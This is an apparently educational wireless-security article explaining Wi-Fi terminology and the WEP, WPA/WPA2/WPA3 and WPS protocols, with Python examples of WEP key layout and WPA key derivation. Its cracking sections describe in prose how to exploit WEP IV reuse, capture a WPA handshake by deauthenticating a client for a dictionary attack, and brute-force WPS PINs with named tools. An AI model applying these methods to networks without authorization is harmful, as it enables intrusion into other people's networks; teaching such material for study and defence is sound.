    Wireless Client: A Wireless Device that connects to the Wireless Access Point to access internet is known as a Wireless Client. Ex : all the devices that connect to a Wi- Fi Router.

    Wireless Local Area Network (WLAN) : The Computer Network comprising of the Wireless Access Point and two or more Wireless Clients is known as Wireless Local Area Network. This is a LAN but without wires.

    Service Set Identifier (SSID) : A Service Set Identifier (SSID) is the name of the Wireless network. Normally, it is broadcast in the clear by Wireless Access Points in beacon packets to announce the presence of a Wi -Fi network. The SSIDs can be up to 32 octets (32 bytes) long. For example, SSID in our first wireless hacking article is “Hack_Me_If_You_Can”.

    Extended Service Set Identifier (ESSID): An Extended Service Set Identifier (ESSID) is a wireless network created by multiple access points. This is useful in providing wireless coverage in a large building or area in which a single Access Point (AP) is not enough. However, this appears as a single seamless network to users. The name is same as SSID.

    Basic Service Set Identifier (BSSID): Previously our readers learnt that every network interface has a hardcoded MAC address. A BSSID is the MAC address of the access point's wireless interface; it is what airodump-ng and aireplay-ng take as the target.

    Channels: Readers have learnt that Wi-Fi operates in the 2.4 GHz and 5 GHz bands. These bands are divided into smaller frequency bands known as channels, usually 20 MHz wide. The 2.4 GHz band is divided into 14 channels spaced 5 MHz apart, so adjacent channels overlap and only three of them (1, 6 and 11) are non-overlapping. The 5 GHz band offers about 24 non-overlapping 20 MHz channels, depending on the country.

    Wi Fi Channels Pic

    In our First wireless hacking attack, the channel of our Access Point is 1.

    Beacons: Beacons are one of the management frames in IEEE 802.11 based WLANs. A Beacon Frame contains all the information about the network and is transmitted periodically to announce the presence of a wireless LAN and to synchronize the members of the WLAN.

    Signal Strength: Wi-Fi signal strength refers to the strength of the received signal. The natural unit is milliwatts, but the numbers are awkward, so signal strength is expressed in dBm, decibels relative to one milliwatt.

    dBm values for Wi-Fi are negative: -34 dBm is a stronger signal than -64 dBm, which in turn is stronger than -94 dBm, since every 10 dB is a factor of ten in power.

    Data: the count of data frames captured from the network; airodump-ng shows it per access point, and for WEP it is the number that has to grow before cracking succeeds.

    Encryption: the Wi-Fi encryption protocol used for security. There are four at present: Wired Equivalent Privacy (WEP), Wi-Fi Protected Access (WPA), Wi-Fi Protected Access 2 (WPA2) and Wi-Fi Protected Access 3 (WPA3). More about them soon.

    Authentication: the method wireless clients use to authenticate with the wireless access point. More about it soon too.

    Cipher: the encryption algorithm used under the security protocol. For example, WPA can use either TKIP or CCMP, while WPA2 uses CCMP (AES).

    Various Wireless threats

    1. Wardriving

    Wardriving is searching for publicly accessible Wi-Fi networks. Publicly accessible networks or open Wi-Fi networks are those wireless networks that are configured without any passwords. Since this attack is usually performed while driving, it is known as war driving. The term War driving originated from the term wardialing, the method which was popularized by a character played by Matthew Broderick in the film WarGames. There are other variants of Wardriving like Warbiking, Warcycling and Warwalking which are similar to wardriving but use other modes of transportation.

    2. Password attacks

    Just now, you have read that, Wi-Fi networks can be configured without a password. This is dangerous in real-world. So, in real world, Wi-Fi networks are usually secured using a password. Only those users who are authorized to use the Wi-Fi are provided with a password using which they can connect. Here are the types of Wireless security protocols that can be used to secure the WiFi network.

    1. Wired Equivalent Privacy (WEP)
    2. Wi-Fi Protected Access (WPA)
    3. Wi-Fi Protected Access 2 (WPA2)
    4. Wi-Fi Protected Access 3 (WPA3)

    Let’s learn about each of these security protocols and how they are cracked in detail.

    Wired Equivalent Privacy (WEP)

    Wired Equivalent Privacy (WEP) is the first security algorithm for IEEE 802.11 wireless networks; it was introduced as part of the original 802.11 standard ratified in 1997. As its name implies, the intention was to provide data confidentiality equivalent to that of a traditional wired network. WEP was the only encryption protocol available to 802.11a and 802.11b devices, as these were built before the WPA standard was released. WEP was ratified as a Wi-Fi security standard in 1999. The first versions of WEP used only 64-bit encryption because the USA restricted the export of cryptographic technology.

    WEP uses the Rivest Cipher 4 (RC4) stream cipher for confidentiality and the 32-bit Cyclic Redundancy Check (CRC-32) checksum for integrity. RC4 is a stream cipher known for its simplicity and speed. Standard 64-bit WEP uses a 40-bit key, which is concatenated with a 24-bit initialization vector (IV; remember this term) to form the RC4 key. A 64-bit WEP key is usually entered as a string of 10 hexadecimal (base 16) characters (0–9 and A–F).


    Each hexadecimal character represents 4 bits, so 10 characters of 4 bits each give 40 bits. Adding the 24-bit initialization vector to these 40 bits produces the complete 64-bit WEP key. Some devices also allow the user to enter the key as 5 ASCII characters (0–9, a–z, A–Z), each of which is turned into 8 bits using the character’s byte value in ASCII. However, this restricts each byte to a printable ASCII character, which is only a small fraction of the possible byte values, greatly reducing the number of possible keys. After the USA lifted its restrictions on the export of cryptographic technology, the 128-bit WEP key came into existence.


    For 128-bit WEP, the key is entered as 26 hexadecimal characters. Each character is again 4 bits, so 26 characters give 104 bits, and adding the 24-bit IV to these 104 bits produces the complete 128-bit WEP key. Most devices also allowed the user to enter the 104-bit key as 13 ASCII characters.


    Although some vendors also made 152-bit and 256-bit WEP systems available, 128-bit WEP was the most widely used.

    Authentication System of WEP:

    WEP uses two methods of authentication. They are,

    1. Open System Authentication:

    In Open System authentication, a WLAN client that wants to connect to an Access Point does not need any credentials during authentication. Simply put, no authentication occurs. Subsequently, WEP keys are used for encrypting data frames, so at that point the client needs to have the correct WEP key.

    2. Shared Key Authentication:

    In Shared Key authentication, authentication takes place in a four-step challenge-response handshake:

    Step 1: The client sends an authentication request to the Access Point.
    Step 2: The Access Point replies with a clear-text challenge.
    Step 3: The client encrypts the challenge-text using the configured WEP key and sends it back in another authentication request.
    Step 4: The Access Point decrypts the response. If this matches the challenge text, the Access Point sends back a positive reply.

    After authentication and association succeed, the pre-shared WEP key is also used for encrypting the data frames with RC4. Although Shared Key Authentication appears more secure than Open System Authentication, it is actually the reverse: the clear-text challenge and its encrypted response reveal a piece of RC4 keystream to anyone listening.

    How to crack WEP passwords:

    WEP uses RC4, which is a stream cipher, so the same keystream must never be used twice. This is why WEP uses Initialization Vectors (IVs). The problem is that WEP uses a 24-bit IV for both the 64-bit and the 128-bit key. A 24-bit IV is not long enough to ensure non-repetition on a busy network: for a 24-bit IV, there is a 50% probability that the same IV will repeat after 5,000 packets. So the WEP key of a busy network can be easily cracked, since it carries a lot of traffic.
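The key layout described in the 64-bit and 128-bit sections above and the IV repetition problem, worked through in a Python example added here (not code from the article or from the Aircrack-ng suite). The sample key and IV are constructed values, and the repetition estimate is the standard birthday bound over the 2^24 possible IVs:

```python
import math

IV_BITS = 24                         # WEP's fixed IV length, for 64-bit and 128-bit keys alike
HEX_LENGTHS = {10: 40, 26: 104}      # hex digits typed -> secret key bits (4 bits per digit)
ASCII_LENGTHS = {5: 40, 13: 104}     # ASCII characters typed -> secret key bits (8 bits each)


def wep_key_bytes(key: str) -> bytes:
    """Convert a WEP key as a user types it (hex or ASCII form) into the raw secret key bytes."""
    if len(key) in HEX_LENGTHS:
        return bytes.fromhex(key)    # 10 digits -> 5 bytes (40 bits), 26 -> 13 bytes (104 bits)
    if len(key) in ASCII_LENGTHS:
        return key.encode("ascii")   # 5 chars -> 5 bytes, 13 chars -> 13 bytes
    raise ValueError("WEP keys are 10/26 hex digits or 5/13 ASCII characters")


def rc4_seed(iv: bytes, key: bytes) -> bytes:
    """WEP simply concatenates the 24-bit IV with the secret key; the result seeds RC4."""
    if len(iv) != IV_BITS // 8:
        raise ValueError("WEP IV must be exactly 3 bytes")
    return iv + key                  # 3 + 5 bytes = 64-bit WEP, 3 + 13 bytes = 128-bit WEP


def ascii_keyspace_fraction(ascii_chars: int, alphabet_size: int = 62) -> float:
    """Fraction of the full key space reachable when the key is typed from 0-9, a-z, A-Z."""
    return alphabet_size ** ascii_chars / 2 ** (8 * ascii_chars)


def iv_repeat_probability(packets: int, iv_bits: int = IV_BITS) -> float:
    """Birthday-bound probability that at least one IV value repeats among `packets` random IVs."""
    return 1.0 - math.exp(-packets * (packets - 1) / (2 * 2 ** iv_bits))


if __name__ == "__main__":
    key = wep_key_bytes("0A1B2C3D4E")                 # constructed 40-bit sample key
    seed = rc4_seed(b"\x01\x02\x03", key)             # constructed sample IV
    print(f"RC4 seed is {len(seed) * 8} bits: {seed.hex()}")
    print(f"5-char ASCII keys cover {ascii_keyspace_fraction(5):.3%} of the 40-bit key space")
    for n in (1000, 5000, 10000):
        print(f"{n:>6} packets: {iv_repeat_probability(n):.0%} chance of a repeated IV")
```

Running it shows the 5,000-packet figure quoted above falling just past the 50% mark, and that 5-character ASCII keys reach well under 0.1% of the 40-bit key space.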

    Attackers can even create fake connections to generate more traffic and then crack the WEP key. As we have seen in this article, the more IVs we capture, the faster WEP is cracked, and it usually takes only minutes to crack a WEP key with the besside-ng tool.

    Wi-Fi Protected Access (WPA)

    Also known as the Temporal Key Integrity Protocol (TKIP) standard, WPA implements the TKIP encryption method and was introduced in 2003. TKIP introduced three new methods to overcome weaknesses in the Wired Equivalent Privacy (WEP) standard.

    1. TKIP implements a key mixing function that combines the secret root key with the initialization vector before passing it to the RC4 cipher initialization. WEP, on the other hand, merely concatenated the initialization vector to the root key and passed this value to the RC4 cipher.
    2. A sequence counter is implemented to protect against replay attacks. Hence, packets received out of order will be rejected by the Access Point.
    3. TKIP implements a 64-bit Message Integrity Check (MIC), replacing the Cyclic Redundancy Check (CRC) used in WEP. The sequence counter is re-initialized each time a new key (Temporal Key) is used.

    Wi-Fi Protected Access 2 (WPA2)

    WPA2 was introduced in 2004 to replace WPA. It implemented the mandatory elements of IEEE 802.11i. 802.11i makes use of the Advanced Encryption Standard (AES) block cipher instead of the RC4 stream cipher used by both WEP and WPA. It also uses the Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP) encryption protocol, which provides the following security services.

    1. Data Confidentiality: It ensures only authorized parties can access the information.
    2. Authentication: provides proof of the genuineness of the user.
    3. Access control in conjunction with layer management.

    WPA – versions:

    There are two versions of WPA. They are,

    1. WPA – Personal:

    Wi-Fi Protected Access (WPA) – Personal is designed for home and small office networks. This version uses a Pre-Shared Key (PSK) and hence is also referred to as WPA-PSK (pre-shared key) mode. The network traffic is encrypted using a 128-bit encryption key derived from a 256-bit shared key. WPA-Personal mode is available on all three WPA versions.

    2. WPA – Enterprise:

    As its name implies, this is designed for enterprise networks and requires a RADIUS authentication server. It requires a more complicated setup but provides additional security, such as protection against dictionary attacks on short passwords. Various kinds of Extensible Authentication Protocol (EAP) are used for authentication. WPA-Enterprise mode is available on all three WPA versions.

    How to crack WPA/WPA2 passwords:

    1. Pre-shared key WPA and WPA2 remain vulnerable to password cracking attacks if users rely on a weak password or passphrase.
    2. WPA passphrase hashes are seeded from the SSID name and its length; rainbow tables exist for the top 1,000 network SSIDs and a multitude of common passwords, requiring only a quick lookup to speed up cracking WPA-PSK.

    Brute forcing of simple passwords can be attempted using the Aircrack suite, starting from the four-way authentication handshake exchanged during association or periodic re-authentication. Earlier in this article, readers saw how a WPA password is cracked. One important feature of cracking WPA/WPA2 is that we don’t need a lot of traffic to crack it. We just need one client connected to the Wi-Fi Access Point. Then we deauthenticate it from the Access Point, and the client automatically tries to connect to the Access Point again.

    It is at this stage that we try to capture the WPA handshake. If you have noticed, while using aircrack to crack the password, we supplied a dictionary or wordlist; while cracking WEP we didn’t.

    So what is a weak password? Any password that is part of a dictionary or wordlist can be called a weak password in WPA. Otherwise, WPA/WPA2 is considered secure. WPA3 replaces cryptographic protocols susceptible to off-line analysis with protocols that require interaction with the infrastructure for each guessed password, supposedly placing temporal limits on the number of guesses. However, design flaws in WPA3 enable attackers to plausibly launch brute-force attacks.
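The passphrase-to-key step behind the two points above (SSID seeding and weak passphrases), as an added Python example that is not code from the article or from Aircrack-ng: WPA/WPA2-Personal derives the 256-bit PSK with PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID, for 4096 rounds. The published IEEE 802.11i test vector (passphrase "password", SSID "IEEE") checks the derivation, and the wordlist is a constructed stand-in for a real dictionary:

```python
import hashlib

PBKDF2_ROUNDS = 4096      # fixed by IEEE 802.11i for WPA/WPA2-Personal
PSK_LEN = 32              # 256-bit Pairwise Master Key


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """Derive the 256-bit PSK (PMK) from a passphrase and SSID as WPA/WPA2-Personal does.
    The SSID is the salt, which is why a precomputed table is only valid for one SSID."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid.encode("utf-8"),
                               PBKDF2_ROUNDS, PSK_LEN)


# Constructed mini wordlist standing in for a real dictionary file.
SAMPLE_WORDLIST = ["password", "12345678", "qwertyuiop", "letmein123"]


def is_weak_passphrase(passphrase: str, wordlist=SAMPLE_WORDLIST) -> bool:
    """A passphrase is 'weak' in the article's sense if it appears in a wordlist:
    whoever holds one captured handshake only needs to try each entry once."""
    return passphrase in wordlist


def psk_work_per_guess() -> int:
    """HMAC-SHA1 computations one guess costs: 32 output bytes need two 20-byte PBKDF2
    blocks of 4096 rounds each. This cost is the only brake on dictionary speed."""
    return 2 * PBKDF2_ROUNDS


if __name__ == "__main__":
    psk = wpa_psk("password", "IEEE")
    print("PSK:", psk.hex())
    # Same passphrase, different SSID: a table built for "IEEE" is useless here.
    print("Differs with SSID:", psk != wpa_psk("password", "IEEE2"))
    print("Weak:", is_weak_passphrase("password"), is_weak_passphrase("correct horse battery staple"))
    print("HMACs per guess:", psk_work_per_guess())
```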

    Wi-Fi Protected Access 3 (WPA3)

    The Wi-Fi Alliance announced WPA3 as a replacement to WPA2 in 2018. The new standard uses an equivalent 192-bit cryptographic strength in WPA3-Enterprise mode (AES-256 in GCM mode with SHA-384 as HMAC) and still mandates the use of CCMP-128 (AES-128 in CCM mode) as the minimum encryption algorithm in WPA3-Personal mode.
    The WPA3 standard also replaces the pre-shared key (PSK) exchange with the Simultaneous Authentication of Equals (SAE) exchange, a method originally introduced with IEEE 802.11s. This results in a more secure initial key exchange in personal mode and forward secrecy.

    Wi-Fi Protected Setup (WPS)

    In 2007, the Wi-Fi Alliance introduced Wi-Fi Protected Setup (WPS). The main purpose of this protocol is to allow home users who have little knowledge of wireless security to set up Wi-Fi Protected Access (for some users, accessing the router dashboard and setting passwords can be too complex). It also makes it easy to add new devices to an existing wireless network without entering long passphrases. WPS also allows the owner of the Wi-Fi to block other users from using their household Wi-Fi. There are two common methods of using WPS.

    1. PIN method:

    Every wireless router with WPS enabled has a PIN (usually printed on a sticker on the router). This PIN must then be entered into any new device that wants to connect to the wireless network. There is no need to memorize a password.

    2. Push Button method:

    In this method, the user has to push a WPS button on both the Access Point and the new wireless client device. On most devices, this discovery mode turns itself off as soon as a connection is established or after a delay (typically 2 minutes or less), whichever comes first, thereby minimizing its vulnerability.

    How to crack WPS pin:

    Although WPS was introduced to simplify Wi-Fi connection problems, it suffers from a major vulnerability. Any attacker within wireless range can recover the WPS PIN in a few hours with a brute-force attack, and once they have it they can easily recover the WPA/WPA2 key as well. Nowadays, all recent models of wireless routers have WPS enabled by default. It is wise to turn off the WPS PIN feature, although this is not possible on many routers.
    WPS is widely understood to have added insecurity to otherwise secure WPA/WPA2. The WPS PIN is an 8-digit PIN that clients present to connect to the wireless router. Instead of checking the entire 8-digit PIN at once, the router checks the first four digits first and then the last four digits. This makes brute forcing WPS PINs very easy.
    This is because the two halves are checked separately: there are 10,000 possibilities for the first half and, since the last digit of the PIN is a checksum, only 1,000 for the second half, 11,000 attempts in total. Once the brute-force software gets the first 4 digits right, the attacker can move on to cracking the last 4 digits.
    The tools Bully and Reaver are the first to come to mind when we want to crack a WPS PIN. However, in our latest tests, both tools presented some problems. You can read our previous articles on Bully and Wifite.


    3. Rogue Access Point attack

    A Rogue Access Point is a wireless access point installed in a secure network that runs without authorization from the network administrator. If this rogue access point runs with weak security, it can compromise the security of the entire network.

    4. Evil Twin attack

    As the name implies, an evil twin is an access point set up with the same name as a legitimate Wi-Fi access point. For example, let’s say there is a Wi-Fi access point named “shunya” that is configured with a WPA2 password. Hackers set up another access point with the same name but without a password (an open network). Users trying to connect to the legitimate access point get connected to this evil twin instead. The evil twin can be considered the wireless equivalent of phishing; it is usually done to capture credentials.

    5. WiFi DoS attack

    In a Wi-Fi DoS attack, the wireless access point is flooded with so many packets that it becomes unavailable to genuine users.

    6. WiFi Packet capture attack

    This attack occurs after the hacker gains access to the Wi-Fi network. After gaining access, hackers try to sniff the traffic of the entire network. Learn more about packet sniffing.